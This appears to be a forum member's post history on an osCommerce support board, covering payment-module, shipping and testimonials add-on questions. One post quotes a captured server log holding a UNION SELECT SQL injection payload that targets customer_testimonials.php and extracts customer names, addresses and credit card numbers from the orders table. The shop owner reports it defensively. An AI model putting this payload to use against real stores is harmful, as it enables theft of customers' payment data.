Jump to content

Dennisra

Members
  • Content count

    539
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Dennisra

  1. I found that ozEworks is correct. The file changes as indicated must be made for Version 4.3.1 to function correctly.
  2. Dennisra

    [Contribution] - USPS Methods

    Be certain that you are logged in with an account that has a valid zip code.
  3. It's not caching the images. Has anyone got this to cache images?
  4. I am now battling this problem. I hope there is a simple fix available.
  5. nusoap.php is from CRE Secure Payment Module for OSC
  6. Dennisra

    InternetSecure MerchantLink

    After I complete a test order at InternetSecure I am returned to my site checkout_process.php page but it is a blank page and the order is never processed by my site. Any suggestions what might be going on?
  7. Dennisra

    InternetSecure MerchantLink

    Mike: Thank you very much for your replies and help.
  8. Dennisra

    ### POINTS AND REWARDS MODULE V1.00 ###

    I need the the Rewards module integrated into this payment gateway add-on InternetSecure MerchantLink 1.0 Private message me as I can pay.
  9. Dennisra

    InternetSecure MerchantLink

    Anyone who has this integrated with the add-on Reward Bonus Points add-on please contact me by private message.
  10. Dennisra

    InternetSecure MerchantLink

    Is there anyone supporting this add-on? I need this to support Reward Bonus Points add-on. Will it do that?
  11. Dennisra

    InternetSecure MerchantLink

    Elavon (http://www.elavon.com/) wants to charge me $899.00 for Internet Secure account. Does that sound right???? or is it a scam??
  12. Zelf: In order to test my installation of this add-on must I have my Merchant User PIN, Virtual Merchant User ID & Virtual Merchant Account ID entered correctly? I tired without them and only got a blank page at confirmation. I have used Elavon and it's predecessors for 20 years and although I have a Merchant ID number I do not believe I was ever issued a Merchant User PIN, Virtual Merchant User ID or Virtual Merchant Account ID. How do you get them? Thanks for any help.
  13. Dennisra

    Official PayPal IPN Support Thread

    I believe you have guessed the answer to your question. I have never received a reply on here.
  14. Dennisra

    USPS Shipping Insurance

    This is what the actual order is: Sub-Total: $69.75 United States Postal Service (1 x 0.3lbs) (0lbs, 5oz) (First Class Mail: Estimated 1 - 5 Days): $1.85 USPS Shipping Insurance: $2.15 Total: $73.75 This is what it looks like in the PayPal payment notification email: Subtotal $69.75 USD Shipping and handling $1.85 USD Total $73.75 USD Payment $73.75 USD Why isn't the USPS Shipping Insurance: $2.15 showing up?
  15. Dennisra

    Official PayPal IPN Support Thread

    This only occurs when there is a "Special" item in the shopping cart. Anyone shed some light on this problem? Has anyone had experience with this error. Is there a fix available? "The totals of the cart item amounts do not match order amounts." In function: before_process() Response from PayPal: [security] = N/A [RequesterCredentials] [0] [Credentials] [0] [username] = N/A [Password] = N/A [subject] = N/A [DoExpressCheckoutPaymentResponse] [0] [Timestamp] = 2008-09-14T06:24:15Z [Ack] = FailureWithWarning [CorrelationID] = 2fd540f051c55 [Errors] [0] [shortMessage] = Invalid Data [LongMessage] = Handling total is invalid. [ErrorCode] = 10428 [severityCode] = Error [1] [shortMessage] = Transaction refused because of an invalid argument. See additional error messages for details. [LongMessage] = The totals of the cart item amounts do not match order amounts. [ErrorCode] = 10413 [severityCode] = Warning [Version] = 2.0 [build] = 690663 [DoExpressCheckoutPaymentResponseDetails] [0] [PaymentInfo] [0] [TransactionType] = none [PaymentType] = none [PaymentStatus] = None [PendingReason] = none [ReasonCode] = none From this request: (WARNING!!) DO NOT expose your API Username/Password to the public!! [?xml version="1.0" encoding="utf-8"?] [soap:Envelope xmlns:soap=http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema] [soap:Header] [RequesterCredentials xmlns=urn:ebay:api:PayPalAPI] [Credentials xmlns=urn:ebay:apis:eBLBaseComponents] [username]snipped[/username] [Password]snipped[/Password] [/Credentials] [/RequesterCredentials] [/soap:Header] [soap:Body] [DoExpressCheckoutPaymentReq xmlns=urn:ebay:api:PayPalAPI] [DoExpressCheckoutPaymentRequest] [Version xmlns=urn:ebay:apis:eBLBaseComponents]2.0[/Version] [DoExpressCheckoutPaymentRequestDetails xmlns=urn:ebay:apis:eBLBaseComponents] [PaymentAction]Sale[/PaymentAction] [Token]snipped[/Token] [PayerID]snipped[/PayerID] [PaymentDetails] [OrderTotal currencyID=USD]111.09[/OrderTotal] [OrderDescription]Order placed on September 14, 2008, 1:22 am snipped[/OrderDescription] [itemTotal currencyID=USD]106.4[/itemTotal] [shippingTotal currencyID=USD]4.8[/shippingTotal] [HandlingTotal currencyID=USD]-0.11[/HandlingTotal] [TaxTotal currencyID=USD]0[/TaxTotal] [NotifyURL]https://snipped paypal_ec/ipn.php?language=english[/NotifyURL] [Custom]Phone: -- Email:snipped[/Custom] [shipToAddress] [Name][/Name] [street1][/street1] [street2][/street2] [CityName][/CityName] [stateOrProvince][/stateOrProvince] [PostalCode][/PostalCode] [Country][/Country] [/shipToAddress] [snipped] [/PaymentDetails] [/DoExpressCheckoutPaymentRequestDetails] [/DoExpressCheckoutPaymentRequest] [/DoExpressCheckoutPaymentReq] [/soap:Body] [/soap:Envelope]
  16. I made this change to seo.class // case ($this->attributes['USE_SEO_REDIRECT'] == 'true'): // header("HTTP/1.0 301 Moved Permanently"); // $url = str_replace('&', '&', $url); // header("Location: $url"); // redirect...bye bye // break; $url = str_replace('&', '&', $url); // Remove the W3C & when redirecting header("HTTP/1.0 301 Moved Permanently"); header("Location: $url"); // redirect...bye bye break; and also tried your suggestion "turn off the W3C option ". Sorry to say no joy. Any other suggestion you may have for me?
  17. Dennisra

    PayPal Express Checkout IPN Payment Module

    This only occurs when there is a "Special" item in the shopping cart. Anyone shed some light on this problem?
  18. Dennisra

    Customer Testimonials v1.0

    Apology accepted and not a problem. I am using version 3.62. I have temporarily removed the contribution until you finish a review. Below is a small portion of my server error log from today. Word sure gets around that customer_testimonials.php has been found on a server and then the break in attempts begin. This has to be done by machine as there is an attempt nearly every second. This ip 38.98.120.73 is PSINet, Inc in Washington DC so these aren't Turkey or Asia originating attacks. /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:24 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:25 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:26 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:27 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:28 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:29 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:30 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:31 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:32 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:33 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:34 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:35 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:40 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:41 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:42 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:43 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:45 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:47 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:47 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:48 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:49 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:50 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:51 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:52 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:53 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:55 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:00 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:00 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:01 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:02 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:03 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:05 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:06 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:07 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:11 2009] [error] [client 72.30.142.221] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:14:23 2009] [error] [client 72.30.142.221] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:02 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:03 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:04 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:05 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:06 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:07 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:08 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:09 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:10 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:11 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:13 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:14 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:15 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:16 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:21 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:22 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:23 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:24 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:25 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:26 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:27 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:28 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:29 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:30 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:31 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:35 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:36 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:36 2009] [error] [client 38.98.120.73] File does not exist:
  19. Dennisra

    Customer Testimonials v1.0

    Below is one of many exploit attempts launched on customer_testimonials.php recorded by mod-security log from my server. Please note that mod-security has so far stopped the hackers but there very likely could be an exploit still available in the Testimonial contribution. Keep in mind I have only had this contribution activated for less than 24 hours. This attack ipn resolves to bellsouth.net ==b4eb491c============================== Request: www.mywesite.com 70.151.0.153 - - [19/Feb/2009:08:47:13 -0600] "GET /customer_testimonials.php?testimoni al_id=99999+union+select+1,2,concat(customers_name,0x3a,customers_email_address, 0x3a,billing_name,0x3a,billing_ company,0x3a,billing_street_address,0x3a,billing_suburb,0x3a,billing_city,0x3a,b illing_postcode,0x3a,billing_st ate,0x3a,billing_country,0x3a,payment_method,0x3a,cc_type,0x3a,cc_owner,0x3a,cc_ number,0x3a,cc_expires),4,5,6,7 ,8,9+from+orders HTTP/1.1" 404 1736 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/200 81217 Firefox/2.0.0.20" SZ1w8Njzn@0AAWTyfYw "-" Handler: cgi-script ---------------------------------------- GET /customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_name,0x3a,customers_email _address,0x3a,billing_name,0x3a,billing_company,0x3a,billing_street_address,0x3a ,billing_suburb,0x3a,billing_ci ty,0x3a,billing_postcode,0x3a,billing_state,0x3a,billing_country,0x3a,payment_me thod,0x3a,cc_type,0x3a,cc_owner ,0x3a,cc_number,0x3a,cc_expires),4,5,6,7,8,9+from+orders HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Connection: keep-alive Host: www.mywebsite.com Keep-Alive: 300 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 mod_security-action: 404 mod_security-message: Access denied with code 404. Pattern match "select.+from" at REQUEST_URI [severity "EMERG ENCY"] HTTP/1.1 404 Condition Intercepted Set-Cookie: Error404=1 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --b4eb491c--
  20. Dennisra

    Customer Testimonials v1.0

    Wow! Take a pill or have a beer. That's really a raw nerve you have exposed there pal.
  21. Dennisra

    Customer Testimonials v1.0

    Apparently this contribution is a major security risk because for mysql injection. See this post: http://forums.oscommerce.com/index.php?sho...t&p=1370715 This topic: http://forums.oscommerce.com/index.php?sho...=328935&hl= Now what?
  22. Dennisra

    Customer Testimonials v1.0

    I found this fix for the title not showing: Bug Fixes Again shooter-boy 19 Nov 2008 Sorry, forgot to add this one: The infobox doesn't seem to display the title of the testimonial. In catalog/includes/boxes/testimonials.php - Find: 'text' => '<a href="' . tep_href_link(FILENAME_CUSTOMER_TESTIMONIALS, tep_get_all_get_params(array('language', 'currency')) .'&testimonial_id=' . $random_testimonial['testimonials_id']) . '"><b><center>' . $testimonial_titulo . '</center></b><br>' . strip_tags($testimonial) . '... ' . TEXT_READ_MORE . '</a>' Replace with: 'text' => '<a href="' . tep_href_link(FILENAME_CUSTOMER_TESTIMONIALS, tep_get_all_get_params(array('language', 'currency')) .'&testimonial_id=' . $random_testimonial['testimonials_id']) . '"><b><center>' . $random_testimonial['testimonials_title'] . '</center></b><br>' . strip_tags($testimonial) . '... ' . TEXT_READ_MORE . '</a>'
  23. Dennisra

    Customer Testimonials v1.0

    I have installed: Version 3.62 by olsonsp4c Scott: I have noticed two things. On the catalog index.html page there is no title showing for testimonials. In the admin portion what shout be a link for "more" is not. I believe in this file /includes/boxes/customer_testimonials.php the following line is not correct. Not the misspelled "$testimonial_titulo". However, even if I correct the spelling to "$testimonial_title" it doesn't work. Would you help me correct these little irratations? 'text' => '<a href="' . tep_href_link(FILENAME_CUSTOMER_TESTIMONIALS, tep_get_all_get_params(array('language', 'currency')) .'&testimonial_id=' . $random_testimonial['testimonials_id']) . '"><b><center>' . $testimonial_titulo . '</center></b><br>' . strip_tags($testimonial) . '...' . TEXT_READ_MORE . '</a><br><br><table border="0" cellspacing="0" cellpadding="0" align="center"><tr align="center"><td align="center" class="infoBoxContents">' . '<b>'.$random_testimonial['testimonials_name'].'</b></td></tr></table>'
  24. I made this change to seo.class // case ($this->attributes['USE_SEO_REDIRECT'] == 'true'): // header("HTTP/1.0 301 Moved Permanently"); // $url = str_replace('&', '&', $url); // header("Location: $url"); // redirect...bye bye // break; $url = str_replace('&', '&', $url); // Remove the W3C & when redirecting header("HTTP/1.0 301 Moved Permanently"); header("Location: $url"); // redirect...bye bye break; and also tried your suggestion "turn off the W3C option ". Sorry to say no joy. Any other suggestion you may have for me?
×